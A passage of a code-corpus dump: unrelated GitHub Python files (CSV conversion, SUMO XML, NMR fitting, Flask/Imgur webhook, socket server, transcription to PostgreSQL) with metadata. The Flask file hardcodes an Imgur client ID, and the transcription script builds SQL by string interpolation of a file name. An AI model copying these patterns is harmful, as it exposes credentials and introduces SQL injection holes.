os.mkdir(FILE_FOLDER)\n \n file_name = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\n \n file_path = FILE_FOLDER + file_name + '.csv'\n\n try:\n with open(file_path, 'w') as outf:\n dw = csv.DictWriter(outf, json[0].keys())\n dw.writeheader()\n for row in json:\n dw.writerow(row)\n except :\n raise Exception(\"Não foi possível criar o arquivo\")\n\n print('Arquivo criado')\nexcept Exception as exception:\n print(exception)","repo_name":"rbalves/json-to-csv","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"24988337486","text":"from xml.dom import minidom\n\n\n# Assumed to contain only edges where trucks are allowed (can be done with netcovert).\n# 2019-09-09-12-00-50/osm.net.xml\ndatapath = \"/home/idlab126/Sumo/Antwerp/\"\nmydoc = minidom.parse(datapath+\"osm_Antwerp.net.xml\") # The original net file obtained with the sumo wizzard\nprint(\"XML parsed\")\nroot = mydoc.documentElement\n\nnewdoc = minidom.Document()\n# root of the new xml file\nnewroot = newdoc.createElement('net')\n\n# set containing the nodes that are used by the network (excluding isolated nodes that is)\nused_nodes = set()\nparallel_edges = set() # parallel edges can occur and we want to deal with them\n\nxml_nodes = set()\nxml_edges = set()\n\n\n\nprint(\"Edges...\")\nedges = mydoc.getElementsByTagName('edge')\nfor item in edges:\n # ignore internal edges\n if not 'function' in item.attributes:\n iid = item.attributes['id'].value\n ffrom = item.attributes['from'].value\n tto = item.attributes['to'].value\n ttype = item.attributes['type'].value\n\n lanes = [child for child in item.childNodes if child.nodeType==minidom.Node.ELEMENT_NODE and child.tagName=='lane']\n length = str(float(lanes[0].attributes['length'].value)+10.0) # edges in the xml file are consistently smaller than when viewed in netedit\n speed = lanes[0].attributes['speed'].value\n nlanes = str(len(lanes))\n\n if (ffrom,tto) in parallel_edges:\n split_node = newdoc.createElement('node')\n split_node.setAttribute(\"id\", f\"split_{iid}\")\n split_node.setAttribute(\"type\", \"parallel_split\")\n xml_nodes.add(split_node)\n\n extra_edge = newdoc.createElement('edge')\n extra_edge.setAttribute(\"id\", iid+\"s\")\n extra_edge.setAttribute(\"from\", ffrom)\n extra_edge.setAttribute(\"to\", split_node.attributes['id'].value)\n extra_edge.setAttribute(\"type\", ttype)\n extra_edge.setAttribute(\"length\", str(0.1)) \n extra_edge.setAttribute(\"speed\", speed)\n extra_edge.setAttribute(\"lanes\", nlanes)\n\n xml_edges.add(extra_edge)\n ffrom = split_node.attributes['id'].value\n\n\n edge = newdoc.createElement('edge')\n edge.setAttribute(\"id\", iid)\n edge.setAttribute(\"from\", ffrom)\n edge.setAttribute(\"to\", tto)\n edge.setAttribute(\"type\", ttype)\n edge.setAttribute(\"length\", length) \n edge.setAttribute(\"speed\", speed)\n edge.setAttribute(\"lanes\", nlanes)\n\n used_nodes.add(ffrom)\n used_nodes.add(tto)\n\n parallel_edges.add((ffrom, tto))\n xml_edges.add(edge)\n\n \n\nprint(\"Junctions...\")\nnodes = mydoc.getElementsByTagName('junction')\nfor item in nodes:\n if item.attributes['id'].value in used_nodes:\n node = newdoc.createElement('node')\n node.setAttribute(\"id\", item.attributes['id'].value)\n node.setAttribute(\"type\", item.attributes['type'].value)\n xml_nodes.add(node)\n\n\n# first write the nodes, then the edges\nfor n in xml_nodes:\n newroot.appendChild(n)\nfor e in xml_edges:\n newroot.appendChild(e)\n\n\n\n\nnewfile = open(datapath+\"Java_osm.net.xml\", \"w\")\nnewfile.write(newroot.toprettyxml())\n","repo_name":"UGent-DNA/TGS","sub_path":"Code/ConfigurationCode/ConvertNetXml.py","file_name":"ConvertNetXml.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"41032409553","text":"from random import randint\nimport time\nstart_time = time.time()\n\n# array = [5, 7, 9, 0, 3, 1, 6, 2, 4, 8]\n\narray = []\nfor _ in range(10000):\n array.append(randint(1, 100))\n# print(array)\ndef quick_sort(array):\n if len(array) <= 1:\n return array\n pivot = array[0]\n tail = array[1:]\n\n left_side = [x for x in tail if x <= pivot]\n right_side = [x for x in tail if x > pivot]\n # print((left_side + [pivot] + right_side))\n return quick_sort(left_side) + [pivot] + quick_sort(right_side)\n\nprint(quick_sort(array))\nprint(\"time : \", time.time() - start_time)\n","repo_name":"beer-2000/problem-solve","sub_path":"ThisIsCodingTest/4_Sorting/퀵정렬_파이썬.py","file_name":"퀵정렬_파이썬.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"30567647726","text":"from numpy.lib.function_base import delete, diff\nimport pandas as pd\n\nimport ast\nimport pprint\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom scipy.stats import gamma\n\n###################################################################################\n#TEMPORARY\n\n#Passing the content of the .csv file to a Pandas DataFrame\ndf = pd.read_csv(r'D:\\Dropbox (Personal)\\Purdue University\\2020_C (Fall Term)\\PHYS590 (NMR)\\Python Programs\\NMR-Nematic-Scaling\\NMR_measurements\\Raw Recovery Data x=0.05898 11.7T.csv')\n\n#Importing the content of the Magnetization_recovery_dict dictionary to a text file\nfile = open(\"NMR-Nematic-Scaling\\Output_Files\\Text_files\\Magnetization_recovery_pairs_dictionary.txt\", \"r\")\ncontents = file.read()\nMagnetization_recovery_dict = ast.literal_eval(contents)\nfile.close()\n#Print statements\n#pprint.pprint(Magnetization_recovery_dict)\n\n###################################################################################\n\n#Data for testing\n\n#for temperature_value in Magnetization_recovery_dict.keys():\ntemperature_value=25.0\n\nx = np.array(df[Magnetization_recovery_dict[temperature_value][0]])\nx = x[np.logical_not(np.isnan(x))]\ny = np.array(df[Magnetization_recovery_dict[temperature_value][1]])\ny = y[np.logical_not(np.isnan(y))]\n\n#Making sure that all time recovery values are in ascenting order\narr1inds = x.argsort()\nx = x[arr1inds[::1]]\ny = y[arr1inds[::1]]\n\ny_norm = ( y - min(y) ) / ( max(y) - min(y) )\n\n###################################################################################\n\n#preparing the grid\nnumber_of_rows = 10000\nDistMax = 0.5\ndeltaDist = DistMax / number_of_rows\nnumber_of_columns = 100000\nW1max=200\ndeltaW1 = W1max / number_of_columns\n\nt_inflection = 1E-3\nInflection_magnetization_exp = 0.55\nxpeak = 0.172722420529815795438\nW1peak = xpeak / t_inflection\n\nslope_at_inflection = .22\n\n# grid initialization: rows and columns\ngrid_distribution = np.zeros(shape=(number_of_rows, number_of_columns))\n\n#Calculation of the squared residue between y data values and prediction\ndef Squared_Residue(z, w):\n return np.linalg.norm(z-w)**2\n\n#the center of each column is equidistant from its next\nW1_fit_points = np.array([ deltaW1/2 + deltaW1 * n for n in range(0,number_of_columns)])\n\n#find the column that the W1peak point belongs to\npeak_column_number = int(np.floor_divide(W1peak, deltaW1)+1)\n\ndef recovery_function(x):\n return (1 - (9/10)*np.exp(-6*x) - (1/10)*np.exp(-x) )\n\n#Squared_Residue(y_norm, recovery_function(x))\n\n###################################################################################\n#distribution\ndef normalization_check(z,dz):\n return np.sum(z)*dz\n\n#triangular distribution\n# initial_dist_shape_dict={\"1\":[2/(W1max*W1peak), 0],\"-1\":[-2/((W1max-W1peak)*W1max), 2/(W1max-W1peak)]}\n# pprint.pprint(initial_dist_shape_dict)\n\n# W1_distribution = np.array( [ initial_dist_shape_dict[\"1\"][0]*W1_fit_points[k]\n# +initial_dist_shape_dict[\"1\"][1]\n# for k in range(0, peak_column_number)]\n# + [ initial_dist_shape_dict[\"-1\"][0]*W1_fit_points[k]\n# +initial_dist_shape_dict[\"-1\"][1]\n# for k in range(peak_column_number, number_of_columns)] )\n\nbeta = 5\nalpha = (W1peak + beta)/beta - 30\nW1_distribution = gamma.pdf(W1_fit_points, a = alpha, scale = beta)\n\ndeltaDist = max(W1_distribution)*1.05/number_of_rows\n\n# W1_distribution[2000] = W1_distribution[2000]*1.00001\n\nW1_distribution_discrete = []\nfor i in range(0,len(W1_distribution)):\n W1_distribution_discrete.append(int(np.rint(W1_distribution[i]/deltaDist)))\n\nW1_distribution_discrete = np.array(W1_distribution_discrete)\n\n###################################################################################\n\ndef log_dev_recovery_function(x):\n return ( (27/5)*x*np.exp(-6*x) + (1/10)*x*np.exp(-x) )\n\ndef second_log_dev_recovery_function(x):\n return ( (27/5)*x*np.exp(-6*x) + (1/10)*x*np.exp(-x) - (162/5)*(x**2)*np.exp(-6*x) - (1/10)*(x**2)*np.exp(-x))\n\n#Inflection Magnetization (0.20736543348999795)\n# np.dot(log_dev_recovery_function(t_inflection*W1_fit_points),W1_distribution)*deltaW1\n\ndef inflection_slope(t_inflection, W1_fit_points, W1_distribution_discrete, deltaDist, deltaW1):\n return np.dot(log_dev_recovery_function(t_inflection*W1_fit_points),W1_distribution_discrete*deltaDist)*deltaW1\n \nprint(inflection_slope(t_inflection, W1_fit_points, W1_distribution_discrete, deltaDist, deltaW1)/0.20736543348999795)\n\n#Inflection Magnetization (0.13902848935038245)\n# np.dot(second_log_dev_recovery_function(t_inflection*W1_fit_points),W1_distribution)*deltaW1\ndef inflection_slope_difference(t_inflection, W1_fit_points, W1_distribution_discrete, deltaDist, deltaW1):\n return np.dot(second_log_dev_recovery_function(t_inflection*W1_fit_points),W1_distribution_discrete*deltaDist)*deltaW1\n\nprint(inflection_slope_difference(t_inflection, W1_fit_points, W1_distribution_discrete, deltaDist, deltaW1)/0.13902848935038245)\n\n###################################################################################\n\n#185996278\n\n# np.rint(1/(deltaW1*deltaDist)) - 185996278\n\n# normalization_check(W1_distribution_discrete, deltaW1)\n\n\n# np.sum(W1_distribution_discrete) - 185996278\n\ndef renormalization(discrete_distribution):\n discrete_distribution = discrete_distribution / (np.sum(discrete_distribution) * (deltaW1*deltaDist))\n for i in range(0,len(discrete_distribution)):\n discrete_distribution[i] = int(np.rint(discrete_distribution[i]))\n return discrete_distribution\n\n###################################################################################\n\n#W1peak\n# def perturbation(distribution, peak_value):\n# for j in range(0,len(distribution)):\n# if j < peak_value:\n\n# else:\n\n#perturb slightly the distribution somewhere\n\n###################################################################################\n# counter=0\n# deviations_second=[0]\n# while( (counter < 25) and (len(deviations_second)!=0) ):\n\ndef numerical_difference(discrete_distribution):\n difference = [ (discrete_distribution[j+1] - discrete_distribution[j]) for j in range(0,len(discrete_distribution) -1) ]\n difference.insert(0,0)\n while (len(difference) < len(discrete_distribution)):\n difference.append(0)\n difference = np.array(difference)\n return difference\n\nDifference_first = numerical_difference(W1_distribution_discrete)\n\n# Difference_second = [ (Difference_first[j+1] - Difference_first[j-1]) for j in range(1,number_of_columns -1) ] #2*W1_distribution_discrete[j] + \n# Difference_second.insert(0,0)\n# Difference_second.insert(number_of_columns,0)\n# Difference_second = np.array(Difference_second)\n\nDifference_second = numerical_difference(Difference_first)\n\n###################################################################################\n\ndef monotonicity_check(discrete_distribution, peak_point):\n monotonicity_list = []\n for j in range(0, peak_point):\n if (discrete_distribution[j] <= -1):\n monotonicity_list.append(j)\n for j in range(peak_point+1, len(discrete_distribution)):\n if (discrete_distribution[j] >= 1):\n monotonicity_list.append(j)\n return monotonicity_list\n\n###################################################################################\n###################################################################################\n\nx_transition1 = 0.065213865307513286845\n\nx_transition2 = 0.43783397651520976759\n\nif (inflection_slope_difference(t_inflection, W1_fit_points, W1_distribution_discrete, deltaDist, deltaW1) < 0):\n if (inflection_slope(t_inflection, W1_fit_points, W1_distribution_discrete, deltaDist, deltaW1) > slope_at_inflection):\n print('Area 2')\n else:\n print('Area 1')\nelse:\n if (inflection_slope(t_inflection, W1_fit_points, W1_distribution_discrete, deltaDist, deltaW1) > slope_at_inflection):\n print('Area 3')\n else:\n print('Area 4')\n\nmax_index = np.argmax(W1_distribution_discrete)\nW1_distribution_discrete[np.floor_divide(max_index*9,10)] += 2\n\n###################################################################################\n\ndef difference_first_check(discrete_distribution, peak_point):\n result=[]\n for j in range(0, peak_point):\n if ( Difference_first[j] > 1 ):\n result.append(j)\n return result\n\ncounter = 1\nwhile True:\n Difference_first = numerical_difference(W1_distribution_discrete)\n monotonicity = monotonicity_check(Difference_first, max_index)\n deviations_first_indices = difference_first_check(Difference_first, max_index)\n\n if ( (len(monotonicity) == 0) and (len(deviations_first_indices) == 0) ):\n break\n else:\n if ((len(monotonicity) > 0)):\n for k in monotonicity:\n if k < max_index:\n W1_distribution_discrete[k] = W1_distribution_discrete[k-1]\n # else:\n # W1_distribution_discrete[k] = W1_distribution_discrete[k-1]\n if ((len(deviations_first_indices) > 0)):\n for k in deviations_first_indices:\n if k < max_index:\n W1_distribution_discrete[k-1] += 1\n # else:\n # W1_distribution_discrete[k] = W1_distribution_discrete[k-1]\n\n print(counter)\n counter+=1\n\nprint(monotonicity)\n\nW1_distribution_discrete = renormalization(W1_distribution_discrete)\n\ninflection_slope(t_inflection, W1_fit_points, W1_distribution_discrete, deltaDist, deltaW1)\ninflection_slope_difference(t_inflection, W1_fit_points, W1_distribution_discrete, deltaDist, deltaW1)\n\n#185996278\n# np.sum(W1_distribution_discrete) - 185996278\n\n# Difference_first[monotonicity[0]]\n# W1_distribution_discrete[monotonicity[0]]\n\n###################################################################################\n\ndeviations_first, deviations_first_count = np.unique(Difference_first, return_counts=True)\ndeviations_second, deviations_second_count = np.unique(Difference_second, return_counts=True)\n\nfor k in [-1, 0, 1]:\n deviations_first = np.delete(deviations_first, np.where(deviations_first == k))\n deviations_second = np.delete(deviations_second, np.where(deviations_second == k))\n\nif len(deviations_second)>0:\n deviations_first_indices={}\n deviations_second_indices={}\n for k in deviations_first:\n result = np.nonzero(Difference_first == k)\n deviations_first_indices[k] = result\n for j in deviations_second:\n result = np.nonzero(Difference_second == j)\n deviations_second_indices[j] = result\n\nlist(deviations_first_indices[2])[0]\n\n###################################################################################\n\n# # # #so we need to focus on 21419 because of the way Difference_first has been set up\n\n# for k in deviations_first:\n# print(list(deviations_first_indices[k][0])[0])\n\n# W1_distribution_discrete[2380]\n\n# if index_first < max_index:\n# if W1_distribution_discrete[index_first-1] < W1_distribution_discrete[index_first]-1:\n# W1_distribution_discrete[index_first-1] = W1_distribution_discrete[index_first]-1\n# if W1_distribution_discrete[index_first+1] < W1_distribution_discrete[index_first]:\n# W1_distribution_discrete[index_first+1] = W1_distribution_discrete[index_first]\n\n###################################################################################\n\n#Quick plot test\nfig, ax = plt.subplots()\n\n# ax.scatter(W1_fit_points, Difference_second, s=20, color='green')\n# ax.scatter(W1_fit_points, Difference_second, s=20, color='red')\n\nax.scatter(W1_fit_points, W1_distribution, s=20, color='red')\nax.scatter(W1_fit_points, W1_distribution_discrete*deltaDist, s=20, color='green')\n\nax.grid()\n\nax.set(xlabel='Relaxation rates (1/s)', ylabel='', title='Probability distribution of the relaxation rates')\n\n#fig.savefig('NMR-Nematic-Scaling\\Output_Files\\Test_of_construction_triangular_distribution_T=30K.png')\n# plt.xlim(73, 75)\nplt.show()\n\n###################################################################################","repo_name":"Stylianos29/NMR-Nematic-Scaling","sub_path":"Optimization.py","file_name":"Optimization.py","file_ext":"py","file_size_in_byte":12072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"42337672872","text":"import socket;\n\nHOST = '127.0.0.1';\nPORT = 56901;\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1);\n s.bind((HOST, PORT));\n s.listen();\n while True:\n conn, addr = s.accept();\n with conn:\n print(f'Conectado com {addr}');\n\n altura, sexo = conn.recv(1024).decode().split(','); \n\n if sexo == 'masculino':\n pesoIdeal = 72.7 * float(altura) - 58;\n else:\n pesoIdeal = 62.1 * float(altura) - 44.7;\n\n resposta = f'O peso ideal é {round(pesoIdeal, 2)}';\n\n conn.sendall(resposta.encode());\n conn.close();","repo_name":"Sistemas-Distribuidos-2022-1/Abrao-Rodrigues","sub_path":"Laboratório-1/ex-04/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"7785505027","text":"#16a_c3.py\r\n#대포 조절\r\n\r\nimport turtle as t\r\nimport random\r\n\r\n#변수 초기화\r\nl=50\r\n\r\ndef reset_cannon(t_ang):\r\n t.color('black')\r\n t.goto(-200, 10)\r\n t.setheading(t_ang)\r\n \r\ndef turn_up():\r\n t.left(2)\r\n\r\ndef turn_down():\r\n t.right(2)\r\n\r\ndef fire():\r\n ang=t.heading()\r\n while t.ycor()>0:\r\n t.forward(15)\r\n t.right(5)\r\n #print(f'x:{t.xcor()}, y:{t.ycor()}')\r\n\r\n # 타겟 충돌 확인\r\n d=t.distance(tx, 0)\r\n if d<= l/2:\r\n t.color('blue')\r\n t.write('Good!', False, 'center', ('D2cording', 15))\r\n else:\r\n t.color('red')\r\n t.write('Bad!', False, 'center', ('D2cording', 15))\r\n reset_cannon(ang)\r\n \r\n#바닥 그리기\r\nt.goto(300, 0)\r\nt.goto(-300, 0)\r\n\r\n#타겟그리기\r\ntx=random.randint(50, 150)\r\n\r\nt.color('green')\r\nt.pensize(5)\r\nt.up()\r\nt.goto(tx - l/2, 3)\r\nt.down()\r\nt.goto(tx + l/2, 3)\r\n\r\n# 대포 초기화\r\nt.up()\r\nreset_cannon(20)\r\n\r\n# 키입력 처리\r\nt.onkeypress(turn_up, 'Up')\r\nt.onkeypress(turn_down, 'Down')\r\nt.onkeypress(fire, 'space')\r\nt.listen()\r\n","repo_name":"09jason1110/python","sub_path":"16a_c3.py","file_name":"16a_c3.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"3491291328","text":"from mpvr.datamodule.manager import Manager as dm\nfrom mpvr.utils.process import *\nimport numpy as np\nimport pandas as pd\ndm = dm.from_config(dm.section_list()[1])\n\nS3 = [x for x in dm.get_scenarios() if 'S3' in x]\nhistograms = [np.zeros(5**6), np.zeros(36)]\nfor scenario in S3:\n print(scenario)\n dm.set_scenario(scenario)\n make_histogram(dm.get_motion_visual_tuple_gen(), histograms)\n\nfor histogram in histograms:\n histogram /= np.sum(histogram)\n\nmpe = []\nincidences = []\nfor scenario in S3:\n print(scenario)\n dm.set_scenario(scenario)\n if scenario in ['S3_surge', 'S3_sway', 'S3_surge', 'S3_sway', 'S3_surge', 'S3_sway', 'S4', 'S5', 'S6']:\n for x in to_mp_entropy(\n mapping_src_to_histogram(dm.get_motion_visual_tuple_gen(),\n histograms,\n factor = 0.1)):\n mpe.append(x)\n else:\n for x in to_mp_entropy(\n mapping_src_to_histogram(dm.get_motion_visual_tuple_gen(),\n histograms)):\n mpe.append(x)\n dm._load_incidence_data()\n for _incidence in dm._incidence:\n incidences.append(_incidence)\nincidences = np.array(incidences)\nmpe = np.array(mpe)\ncor['S3'] = correlation(incidences, mpe)\nindices = mpe > np.quantile(mpe, 0.75)\ncor['S3_q1'] = correlation(incidences[indices], mpe[indices])\n\nmpe = np.array(mpe)\ntimes = np.linspace(1.0/3, 110, 110*3)\npath = dm._setting.save_result_path + 'MPEntropy/table/total/S3.csv'\ndf = pd.DataFrame(mpe, times)\ndf.index.name = 'Time'\ndf.columns = ['MP entropy']\ndf.to_csv(path)\n\nfig, axes = dm.fig_setup(2, ['MP Entropy', 'Incidence'], np.arange(0, 114, 2), times = times)\n\ndm.ax_color_by_value(axes[0], times, mpe, 0)\naxes[0].set_ylim([-200000, 200000])\naxes[1].bar(times, incidences, width=0.2)\ndm.fig_finalize(tag='mpe', file_name='S3', remark_dir='total/')\n\n\n\nS6 = ['S6']\nhistograms = [np.zeros(5**6), np.zeros(36)]\nfor scenario in S6:\n print(scenario)\n dm.set_scenario(scenario)\n make_histogram(dm.get_motion_visual_tuple_gen(), histograms)\n\nfor histogram in histograms:\n histogram /= np.sum(histogram)\n\nmpe = []\nincidences = []\nfor scenario in S6:\n print(scenario)\n dm.set_scenario(scenario)\n if scenario in ['S6_surge', 'S6_sway', 'S6_surge', 'S6_sway', 'S6_surge', 'S6_sway', 'S6', 'S6', 'S6']:\n for x in to_mp_entropy(\n mapping_src_to_histogram(dm.get_motion_visual_tuple_gen(),\n histograms,\n factor = 0.1)):\n mpe.append(x)\n else:\n for x in to_mp_entropy(\n mapping_src_to_histogram(dm.get_motion_visual_tuple_gen(),\n histograms)):\n mpe.append(x)\n dm._load_incidence_data()\n for _incidence in dm._incidence:\n incidences.append(_incidence)\nincidences = np.array(incidences)\nmpe = np.array(mpe)\ncor['S6'] = correlation(incidences, mpe)\nindices = mpe > np.quantile(mpe, 0.75)\ncor['S6_q1'] = correlation(incidences[indices], mpe[indices])\n\n\nfor scenario in dm.get_scenarios():\n print(scenario)\n dm.set_scenario(scenario)\n histograms = [np.zeros(5**6), np.zeros(36)]\n motion_data = np.array([x for x in dm.get_motion_data_gen()])\n\n mot_vis_gen = dm.make_tuple_gen(\n dm.get_classified_motion_data_gen(motion_data),\n dm.get_classified_visual_data_gen())\n make_histogram(mot_vis_gen, histograms)\n for hist in histograms:\n hist /= np.sum(hist)\n\n mot_vis_gen = dm.make_tuple_gen(\n dm.get_classified_motion_data_gen(motion_data),\n dm.get_classified_visual_data_gen())\n mapped = mapping_src_to_histogram(mot_vis_gen, histograms)\n mpe = [x for x in to_mp_entropy(mapped)]\n dm._load_timestamp_data()\n dm.save_scenario_as_table(mpe, 'mpe', remark_dir='ongame')\n\nfor scenario in dm.get_scenarios():\n print(scenario)\n dm.set_scenario(scenario)\n\n df = dm.get_processed_data('mpe', remark_dir='ongame/')\n time, mpe_ongame = df['Time'].values, df['MPEntropy'].values\n df = dm.get_processed_data('mpe')\n mpe = df['MPEntropy'].values\n incidence = dm.get_incidence_data()\n\n fig, axes = dm.fig_setup(2, ['MP Entropy', 'Incidence'], np.arange(0, len(time)/3, 2), times = time)\n axes[0].plot(time, mpe_ongame, ':', label='After 3D motion')\n axes[0].plot(time, mpe, label='Before 3D motion')\n axes[0].legend()\n axes[0].set_ylim([-300000, 300000])\n axes[1].bar(time, incidence, width = 0.2)\n axes[1].set_yticks(np.arange(0, 5, 1))\n dm.fig_finalize(tag='mpe', remark_dir='ongame/')\n","repo_name":"nearj/mpvr-motionfiltering","sub_path":"test/motiondevice_aug_27.py","file_name":"motiondevice_aug_27.py","file_ext":"py","file_size_in_byte":4653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"25063547195","text":"from flask import Flask, request, make_response, jsonify\n\nimport pyimgur\nimport random\n\n\n\n## heruko\ndef morning():\n\n r = random.randrange(1, 7)\n\n\n client_id = '0d519e46f026f35'\n print(r)\n path = '早安/' + '長輩圖 ' + '(' + str(r) + ')' + '.jpg'\n\n im = pyimgur.Imgur(client_id)\n upload_image = im.upload_image(path)\n\n return upload_image.link\n\n\n\ndef afternoon():\n\n r = random.randrange(1, 8)\n\n client_id = '0d519e46f026f35'\n print(r)\n path = '午安/' + '長輩圖 ' + '(' + str(r) + ')' + '.jpg'\n\n im = pyimgur.Imgur(client_id)\n upload_image = im.upload_image(path)\n\n return upload_image.link\n\ndef goodnight():\n\n r = random.randrange(1, 7)\n\n client_id = '0d519e46f026f35'\n print(r)\n path = '晚安/' + '長輩圖 ' + '(' + str(r) + ')' + '.jpg'\n\n im = pyimgur.Imgur(client_id)\n upload_image = im.upload_image(path)\n\n return upload_image.link\n\n\ndef hell():\n\n r = random.randrange(1, 8)\n\n client_id ='0d519e46f026f35'\n print(r)\n path = '地獄/' + '地獄 ' + '(' + str(r) + ')' + '.jpg'\n\n im = pyimgur.Imgur(client_id)\n upload_image = im.upload_image(path)\n\n return upload_image.link\n\napp = Flask(__name__)\n\n\n@app.route('/', methods=['GET', 'POST'])\n\ndef webhook():\n json = request.get_json(silent=True,force=True)\n\n res_message = {\"fulfillmentText\": None}\n \n if json['queryResult']['parameters']['any'] == \"菜單\":\n msg = \"\"\n msg += \"以下為所有功能:\\n\"\n msg += \"輸入 早安\\n\"\n msg += \"輸入 午安\\n\"\n msg += \"輸入 晚安\\n\"\n msg += \"輸入 地獄\\n\"\n \n res_message = {\"fulfillmentMessages\": [ { \"text\": { \"text\": [msg] } } ] }\n\n elif json['queryResult']['parameters']['any'] == \"早安\":\n \n msg = morning()\n res_message = {\"fulfillmentMessages\" : [ {\"image\" : { \"imageUri\" : msg } } ] } \n\n\n elif json['queryResult']['parameters']['any'] == \"地獄\":\n \n msg = hell()\n res_message = {\"fulfillmentMessages\" : [ {\"image\" : { \"imageUri\" : msg } } ] } \n\n\n elif json['queryResult']['parameters']['any'] == \"午安\":\n \n msg = afternoon()\n res_message = {\"fulfillmentMessages\" : [ {\"image\" : { \"imageUri\" : msg } } ] } \n \n elif json['queryResult']['parameters']['any'] == \"晚安\":\n \n msg = goodnight()\n res_message = {\"fulfillmentMessages\" : [ {\"image\" : { \"imageUri\" : msg } } ] } \n\n return make_response(jsonify(res_message))\n\n\nif __name__ == \"__main__\":\n app.run(port=5000)","repo_name":"FCU-D0772451/Car_Accident_Chatbot","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"31044129493","text":"import re\nfrom setuptools import find_packages, setup\n\ninstall_requires = [\n 'attrs>=17.2.0',\n 'Django>=1.8',\n 'six>=1.1',\n 'wrapt>=1.10.10,<2',\n]\n\ndocs_require = [\n 'sphinx>=1.4.0',\n]\n\ntests_require = [\n 'bumpversion==0.5.3',\n 'coverage==.4.2',\n 'pytest==3.0.5',\n 'pytest-cov==2.5.1',\n 'pytest-django==3.1.2',\n\n # Linting\n 'isort==4.2.5',\n 'flake8==3.0.3',\n 'flake8-blind-except==0.1.1',\n 'flake8-debugger==1.4.0',\n]\n\nwith open('README.rst') as fh:\n long_description = re.sub(\n '^.. start-no-pypi.*^.. end-no-pypi', '', fh.read(), flags=re.M | re.S)\n\n\nsetup(\n name='django-aws-xray',\n version='0.2.2',\n description=\"Django AWS X-Ray\",\n long_description=long_description,\n url='https://github.com/mvantellingen/django-aws-xray',\n author=\"Michael van Tellingen\",\n author_email=\"\",\n install_requires=install_requires,\n tests_require=tests_require,\n extras_require={\n 'docs': docs_require,\n 'test': tests_require,\n },\n use_scm_version=True,\n entry_points={},\n package_dir={'': 'src'},\n packages=find_packages('src'),\n include_package_data=True,\n license='MIT',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Framework :: Django :: 1.11',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n ],\n zip_safe=False,\n)\n","repo_name":"mvantellingen/django-aws-xray","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"63"} +{"seq_id":"6673240665","text":"class ICAPResponseHeader (object):\n\t__slots__ = ['info', 'version', 'code', 'status', 'headers', 'header_string', 'offsets', 'content_length', 'body_complete']\n\n\tdef __init__ (self, version, code, status, headers, header_string, offsets, content_length, body_complete):\n\t\tself.info = version, code, status\n\t\tself.version = version\n\t\tself.code = code\n\t\tself.status = status\n\t\tself.headers = headers\n\t\tself.header_string = header_string\n\t\tself.offsets = offsets\n\t\tself.content_length = content_length\n\t\tself.body_complete = body_complete\n\n\n\nclass ICAPResponseHeaderFactory (object):\n\tdef __init__ (self, configuration):\n\t\tself.configuration = configuration\n\n\tdef create (self, version, code, status, headers, header_string, offsets, content_length, body_complete):\n\t\treturn ICAPResponseHeader(version, code, status, headers, header_string, offsets, content_length, body_complete)\n","repo_name":"Exa-Networks/exaproxy","sub_path":"lib/exaproxy/icap/header.py","file_name":"header.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":145,"dataset":"github-code","pt":"63"} +{"seq_id":"36136592861","text":"import sys\nimport os\nimport psycopg2\nfrom trancribe2 import *\n#recibe el directorio a analizar y el tipo de archivo que buscara\ndir_path = sys.argv[1]\next_buscada = sys.argv[2]\nfecha_grabacion = sys.argv[3]\n#guarda los archivos que analizara \nres = []\n\nconfig = configparser.ConfigParser()\nconfig.read(\"config.ini\")\n\nfor path in os.listdir(dir_path):\n if os.path.isfile(os.path.join(dir_path, path)):\n root, extension = os.path.splitext(path)\n #valida que el tipo de archivo sea el buscado\n if extension==ext_buscada:\n res.append(path)\n # llama a la transcripción y almacenamiento en la base de datos\n\n try:\n connection = psycopg2.connect(user=config[\"DEFAULT\"][\"DB_USER\"],\n password=config[\"DEFAULT\"][\"DB_PASSWORD\"],\n host=config[\"DEFAULT\"][\"DB_HOST\"],\n port=config[\"DEFAULT\"][\"DB_PORT\"],\n database=config[\"DEFAULT\"][\"DB_NAME\"])\n cursor = connection.cursor()\n\n query=\"\"\" select count(1) from texto_analizado where archivo= '%s' ;\"\"\"\n #existe_registro = (path)\n query_comp= (query % path)\n cursor.execute(query_comp)\n connection.commit()\n cuantos=cursor.fetchone()[0]\n print(cuantos)\n if cuantos==0:\n transcribe(dir_path, path, fecha_grabacion)\n else:\n print('Ya fue procesado')\n\n except (Exception, psycopg2.Error) as error:\n print(\"Error al buscar el registro\", error, path)\n finally:\n # closing database connection.\n if connection:\n cursor.close()\n connection.close()\n print(\"Conexion 